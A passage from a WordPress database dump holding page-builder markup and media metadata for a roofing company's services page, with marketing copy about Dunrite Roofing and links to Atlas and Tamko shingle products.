Corning, we know it’s More Than Just a Roof®.</p></div></a><a href=\"https://dunriteroof.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Dunrite Roofing</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Quality and your satisfaction is our priority</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Roofing','','inherit','closed','closed','','263-revision-v1','','','2022-08-25 00:03:38','2022-08-25 00:03:38','',263,'https://cteisys.com/?p=497',0,'revision','',0),(495,1,'2022-08-25 00:00:36','2022-08-25 00:00:36','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"bca5f70a-ec15-4c77-90f2-38d71afc07c1\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-bca5f70a-ec15-4c77-90f2-38d71afc07c1.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"96e5ce01-51b2-45b1-999e-8e1821167485\"} -->\n<style type=\"text/css\"> .block-96e5ce01-51b2-45b1-999e-8e1821167485 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-96e5ce01-51b2-45b1-999e-8e1821167485 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-96e5ce01-51b2-45b1-999e-8e1821167485 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-96e5ce01-51b2-45b1-999e-8e1821167485 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-96e5ce01-51b2-45b1-999e-8e1821167485 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-96e5ce01-51b2-45b1-999e-8e1821167485 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-96e5ce01-51b2-45b1-999e-8e1821167485 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-96e5ce01-51b2-45b1-999e-8e1821167485 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"0a5c8e70-53e6-4806-ab4e-3f207984f96c\"} -->\n<style type=\"text/css\"> .block-0a5c8e70-53e6-4806-ab4e-3f207984f96c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0a5c8e70-53e6-4806-ab4e-3f207984f96c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0a5c8e70-53e6-4806-ab4e-3f207984f96c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0a5c8e70-53e6-4806-ab4e-3f207984f96c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0a5c8e70-53e6-4806-ab4e-3f207984f96c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0a5c8e70-53e6-4806-ab4e-3f207984f96c\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"e7cd16d2-a05d-4642-b47e-bf094b9ebb9f\"} -->\n<style type=\"text/css\"> .block-e7cd16d2-a05d-4642-b47e-bf094b9ebb9f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e7cd16d2-a05d-4642-b47e-bf094b9ebb9f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e7cd16d2-a05d-4642-b47e-bf094b9ebb9f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e7cd16d2-a05d-4642-b47e-bf094b9ebb9f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e7cd16d2-a05d-4642-b47e-bf094b9ebb9f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e7cd16d2-a05d-4642-b47e-bf094b9ebb9f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:heading {\"level\":3} -->\n<h3>EXPERIENCE THE DUNRITE DIFFERENCE</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dunrite Roofing has been working hard for three generations to provide you our ultimate goal:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>100% customer satisfaction. Locally owned and operated for 25+ years, contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"cd457520-8b0f-42ce-ab64-cc487e5a0371\"} -->\n<style type=\"text/css\"> .block-cd457520-8b0f-42ce-ab64-cc487e5a0371 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-cd457520-8b0f-42ce-ab64-cc487e5a0371 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-cd457520-8b0f-42ce-ab64-cc487e5a0371 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-cd457520-8b0f-42ce-ab64-cc487e5a0371 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-cd457520-8b0f-42ce-ab64-cc487e5a0371 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-cd457520-8b0f-42ce-ab64-cc487e5a0371 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd457520-8b0f-42ce-ab64-cc487e5a0371 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-cd457520-8b0f-42ce-ab64-cc487e5a0371 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"62ef21e7-2f17-4d76-8c8d-8c3a86527149\"} -->\n<style type=\"text/css\"> .block-62ef21e7-2f17-4d76-8c8d-8c3a86527149 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-62ef21e7-2f17-4d76-8c8d-8c3a86527149 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-62ef21e7-2f17-4d76-8c8d-8c3a86527149 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-62ef21e7-2f17-4d76-8c8d-8c3a86527149 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-62ef21e7-2f17-4d76-8c8d-8c3a86527149 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-62ef21e7-2f17-4d76-8c8d-8c3a86527149\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"31dda340-1395-4ce9-b3bd-ad2ba937dc70\"} -->\n<style type=\"text/css\"> .block-id-31dda340-1395-4ce9-b3bd-ad2ba937dc70 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-31dda340-1395-4ce9-b3bd-ad2ba937dc70 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-31dda340-1395-4ce9-b3bd-ad2ba937dc70 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-31dda340-1395-4ce9-b3bd-ad2ba937dc70 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>Never worry again with a new roof replacement from Dunrite. With Mike or Justin on every job you can be sure to receive quality that cannot be beat. Whether it is a residential tear off, new construction or the installation of a metal accent roof take a look at some options below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"You’re Looking For\\u003cbr\\u003eProtection You Deserve\",\"title\":\"Atlas Shingles\",\"cta_url\":\"https://www.atlasroofing.com/roof-shingles\",\"img_id\":484,\"img_url\":{\"id\":484,\"title\":\"atlas roof shingles\",\"filename\":\"atlas-roof-shingles.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/atlas-roof-shingles/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"atlas-roof-shingles\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:39.000Z\",\"modified\":\"2022-08-24T23:19:39.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"f4e29dfaf0\",\"delete\":\"cda8092ac3\",\"edit\":\"4d4ab539cc\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=484\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"16306\",\"filesizeHumanReadable\":\"16 KB\",\"context\":\"\",\"height\":170,\"width\":306,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":167,\"width\":300,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-300x167.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"height\":170,\"width\":306,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e3 images reduced by 21.1 KB (60.7%)\\u003cbr /\\u003eImage size: 15.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-484\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eMEDIUM \\u003cbr /\\u003e (300x167)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.3 KB ( 49.5% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x150)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 64.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.8 KB ( 74.6% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"title\":\"Tamko Products\",\"cta_url\":\"https://www.tamko.com/\",\"hover_description\":\"Shingles crafted with American Pride\",\"img_id\":486,\"img_url\":{\"id\":486,\"title\":\"tamco\",\"filename\":\"tamco.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/tamco/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"tamco\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:57.000Z\",\"modified\":\"2022-08-24T23:19:57.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"6acecdcaed\",\"delete\":\"ba51f566bc\",\"edit\":\"906a5258b4\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=486\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"18355\",\"filesizeHumanReadable\":\"18 KB\",\"context\":\"\",\"height\":129,\"width\":291,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":129,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco-150x129.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"height\":129,\"width\":291,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 13.9 KB (61.0%)\\u003cbr /\\u003eImage size: 17.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-486\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x129)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 55.3% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e 